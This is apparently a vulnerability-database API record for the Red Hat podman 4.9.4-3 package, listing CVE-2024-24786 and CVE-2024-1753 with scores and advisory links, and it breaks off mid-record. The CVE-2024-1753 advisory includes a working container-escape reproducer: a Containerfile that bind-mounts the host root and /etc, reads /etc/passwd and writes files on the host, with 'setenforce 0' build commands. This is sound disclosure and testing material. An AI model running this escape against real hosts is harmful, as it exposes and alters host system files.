Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/93919?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/93919?format=api", "purl": "pkg:rpm/redhat/podman@4:4.9.4-3?arch=el9_4", "type": "rpm", "namespace": "redhat", "name": "podman", "version": "4:4.9.4-3", "qualifiers": { "arch": "el9_4" }, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/16464?format=api", "vulnerability_id": "VCID-f8ak-21d8-juff", "summary": "Golang protojson.Unmarshal function infinite loop when unmarshaling certain forms of invalid JSON\nThe protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-24786.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-24786.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-24786", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54531", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54528", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.5449", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54511", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54529", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54517", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54523", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00322", "scoring_system": "epss", "scoring_elements": "0.55266", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00322", "scoring_system": "epss", "scoring_elements": "0.5527", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00322", "scoring_system": "epss", "scoring_elements": "0.55289", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00393", "scoring_system": "epss", "scoring_elements": "0.60287", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-24786" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24786", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24786" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/protocolbuffers/protobuf-go", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/protocolbuffers/protobuf-go" }, { "reference_url": "https://github.com/protocolbuffers/protobuf-go/commit/f01a588e5810b90996452eec4a28f22a0afae023", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/protocolbuffers/protobuf-go/commit/f01a588e5810b90996452eec4a28f22a0afae023" }, { "reference_url": "https://github.com/protocolbuffers/protobuf-go/releases/tag/v1.33.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/protocolbuffers/protobuf-go/releases/tag/v1.33.0" }, { "reference_url": "https://go.dev/cl/569356", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/" } ], "url": "https://go.dev/cl/569356" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24786", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24786" }, { "reference_url": "https://pkg.go.dev/vuln/GO-2024-2611", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/" } ], "url": "https://pkg.go.dev/vuln/GO-2024-2611" }, { "reference_url": "https://security.netapp.com/advisory/ntap-20240517-0002", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://security.netapp.com/advisory/ntap-20240517-0002" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2024/03/08/4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065684", "reference_id": "1065684", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065684" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268046", "reference_id": "2268046", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268046" }, { "reference_url": "https://security.gentoo.org/glsa/202407-12", "reference_id": "GLSA-202407-12", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202407-12" }, { "reference_url": "https://security.gentoo.org/glsa/202407-25", "reference_id": "GLSA-202407-25", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202407-25" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/", "reference_id": "JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/" }, { "reference_url": "https://security.netapp.com/advisory/ntap-20240517-0002/", "reference_id": "ntap-20240517-0002", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/" } ], "url": "https://security.netapp.com/advisory/ntap-20240517-0002/" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:0040", "reference_id": "RHSA-2024:0040", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:0040" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:0043", "reference_id": "RHSA-2024:0043", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:0043" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10852", "reference_id": "RHSA-2024:10852", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10852" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1362", "reference_id": "RHSA-2024:1362", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1362" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1363", "reference_id": "RHSA-2024:1363", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1363" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1456", "reference_id": "RHSA-2024:1456", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1456" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1461", "reference_id": "RHSA-2024:1461", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1461" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1474", "reference_id": "RHSA-2024:1474", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1474" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1507", "reference_id": "RHSA-2024:1507", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1507" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1508", "reference_id": "RHSA-2024:1508", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1508" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1537", "reference_id": "RHSA-2024:1537", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1537" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1538", "reference_id": "RHSA-2024:1538", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1538" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1616", "reference_id": "RHSA-2024:1616", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1616" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1765", "reference_id": "RHSA-2024:1765", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1765" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1795", "reference_id": "RHSA-2024:1795", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1795" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1859", "reference_id": "RHSA-2024:1859", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1859" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1874", "reference_id": "RHSA-2024:1874", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1874" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1925", "reference_id": "RHSA-2024:1925", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1925" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:1946", "reference_id": "RHSA-2024:1946", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:1946" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2096", "reference_id": "RHSA-2024:2096", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2096" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2549", "reference_id": "RHSA-2024:2549", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2549" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2550", "reference_id": "RHSA-2024:2550", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2550" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2639", "reference_id": "RHSA-2024:2639", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2639" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2666", "reference_id": "RHSA-2024:2666", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2666" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2773", "reference_id": "RHSA-2024:2773", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2773" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2781", "reference_id": "RHSA-2024:2781", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2781" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2874", "reference_id": "RHSA-2024:2874", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2874" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2901", "reference_id": "RHSA-2024:2901", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2901" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3316", "reference_id": "RHSA-2024:3316", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3316" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3617", "reference_id": "RHSA-2024:3617", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3617" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3621", "reference_id": "RHSA-2024:3621", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3621" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3634", "reference_id": "RHSA-2024:3634", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3634" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3635", "reference_id": "RHSA-2024:3635", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3635" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3636", "reference_id": "RHSA-2024:3636", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3636" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3637", "reference_id": "RHSA-2024:3637", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3637" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3683", "reference_id": "RHSA-2024:3683", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3683" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3715", "reference_id": "RHSA-2024:3715", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3715" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3717", "reference_id": "RHSA-2024:3717", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3717" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:3868", "reference_id": "RHSA-2024:3868", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:3868" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:4150", "reference_id": "RHSA-2024:4150", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:4150" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:4163", "reference_id": "RHSA-2024:4163", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:4163" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:4246", "reference_id": "RHSA-2024:4246", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:4246" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:4455", "reference_id": "RHSA-2024:4455", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:4455" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:4597", "reference_id": "RHSA-2024:4597", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:4597" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:4626", "reference_id": "RHSA-2024:4626", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:4626" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5013", "reference_id": "RHSA-2024:5013", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5013" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5054", "reference_id": "RHSA-2024:5054", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5054" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5422", "reference_id": "RHSA-2024:5422", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5422" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6004", "reference_id": "RHSA-2024:6004", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6004" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6221", "reference_id": "RHSA-2024:6221", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6221" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6409", "reference_id": "RHSA-2024:6409", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6409" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:7184", "reference_id": "RHSA-2024:7184", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:7184" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:7548", "reference_id": "RHSA-2024:7548", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:7548" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8040", "reference_id": "RHSA-2024:8040", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8040" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8434", "reference_id": "RHSA-2024:8434", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8434" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8676", "reference_id": "RHSA-2024:8676", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8676" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8677", "reference_id": "RHSA-2024:8677", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8677" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8704", "reference_id": "RHSA-2024:8704", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8704" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9615", "reference_id": "RHSA-2024:9615", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9615" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0654", "reference_id": "RHSA-2025:0654", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0654" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0664", "reference_id": "RHSA-2025:0664", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0664" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:4204", "reference_id": "RHSA-2025:4204", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:4204" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:9776", "reference_id": "RHSA-2025:9776", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:9776" }, { "reference_url": "https://usn.ubuntu.com/6746-1/", "reference_id": "USN-6746-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6746-1/" }, { "reference_url": "https://usn.ubuntu.com/6746-2/", "reference_id": "USN-6746-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6746-2/" } ], "fixed_packages": [], "aliases": [ "CVE-2024-24786", "GHSA-8r3f-844c-mc37" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f8ak-21d8-juff" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/16734?format=api", "vulnerability_id": "VCID-gyyv-8fkv-syh5", "summary": "Podman affected by CVE-2024-1753 container escape at build time\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nUsers running containers with root privileges allowing a container to run with read/write access to the host system files when selinux is not enabled. With selinux enabled, some read access is allowed.\n\n### Patches\nFrom @nalind . This is a patch for Buildah (https://github.com/containers/buildah) Once fixed there, Buildah will be vendored into Podman.\n\n```\n# cat /root/cve-2024-1753.diff\n--- internal/volumes/volumes.go\n+++ internal/volumes/volumes.go\n@@ -11,6 +11,7 @@ import (\n \n \t\"errors\"\n \n+\t\"github.com/containers/buildah/copier\"\n \t\"github.com/containers/buildah/define\"\n \t\"github.com/containers/buildah/internal\"\n \tinternalParse \"github.com/containers/buildah/internal/parse\"\n@@ -189,7 +190,11 @@ func GetBindMount(ctx *types.SystemContext, args []string, contextDir string, st\n \t// buildkit parity: support absolute path for sources from current build context\n \tif contextDir != \"\" {\n \t\t// path should be /contextDir/specified path\n-\t\tnewMount.Source = filepath.Join(contextDir, filepath.Clean(string(filepath.Separator)+newMount.Source))\n+\t\tevaluated, err := copier.Eval(contextDir, newMount.Source, copier.EvalOptions{})\n+\t\tif err != nil {\n+\t\t\treturn newMount, \"\", err\n+\t\t}\n+\t\tnewMount.Source = evaluated\n \t} else {\n \t\t// looks like its coming from `build run --mount=type=bind` allow using absolute path\n \t\t// error out if no source is set\n```\n### Reproducer\n\nPrior to testing, as root, add a memorable username to `/etc/passwd` via adduser or your favorite editor. Also create a memorably named file in `/`. Suggest: `touch /SHOULDNTSEETHIS.txt` and `adduser SHOULDNTSEETHIS`. After testing, remember to remove both the file and the user from your system.\n\nUse the following Containerfile\n\n```\n# cat ~/cve_Containerfile\nFROM alpine as base\n\nRUN ln -s / /rootdir\nRUN ln -s /etc /etc2\n\nFROM alpine\n\nRUN echo \"ls container root\"\nRUN ls -l /\n\nRUN echo \"With exploit show host root, not the container's root, and create /BIND_BREAKOUT in / on the host\"\nRUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit\n\nRUN echo \"With exploit show host /etc/passwd, not the container's, and create /BIND_BREAKOUT2 in /etc on the host\"\nRUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2 \n```\n\n#### To Test\n\n##### Testing with an older version of Podman with the issue\n```\nsetenforce 0\npodman build -f ~/cve_Containerfile .\n```\n\nAs part of the printout from the build, you should be able to see the contents of the `/' and `/etc` directories, including the `/SHOULDNOTSEETHIS.txt` file that you created, and the contents of the `/etc/passwd` file which will include the `SHOULDNOTSEETHIS` user that you created. In addition, the file `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT2` will exist on the host after the command is completed. Be sure to remove those two files between tests. \n\n```\npodman rm -a\npodman rmi -a\nrm /BIND_BREAKOUT\nrm /etc/BIND_BREAKOUT2\nsetenforce 1\npodman build -f ~/cve_Containerfile .\n```\nNeither the `/BIND_BREAKEOUT` or `/etc/BIND_BREAKOUT2` files should be created. An error should be raised during the build when both files are trying to be created. Also, errors will be raised when the build tries to display the contents of the `/etc/passwd` file, and nothing will be displayed from that file. \n\nHowever, the files in both the `/` and `/etc` directories on the host system will be displayed.\n\n##### Testing with the patch\n\nUse the same commands as testing with an older version of Podman.\n\nWhen running using the patched version of Podman, regardless of the `setenforce` settings, you should not see the file that you created or the user that you added. Also the `/BIND_BREAKOUT` and the `/etc/BIND_BREAKOUT` will not exist on the host after the test completes.\n\nNOTE: With the fix, the contents of the `/` and `/etc` directories, and the `/etc/passwd` file will be displayed, however, it will be the file and contents from the container image, and NOT the host system. Also the `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT` files will be created in the container image.\n\n\n### Workarounds\nEnsure selinux controls are in place to avoid compromising sensitive system files and systems. With \"setenforce 0\" set, which is not at all advised, the root file system is open for modification with this exploit. With \"setenfoce 1\" set, which is the recommendation, files can not be changed. However, the contents of the `/` directory can be displayed. I.e., `ls -alF /` will show the contents of the host directory.\n\n### References\n\nUnknown.", "references": [ { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2049", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2049" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2055", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/" } ], "url": "https://access.redhat.com/errata/RHSA-2024:2055" }, { "reference_url": 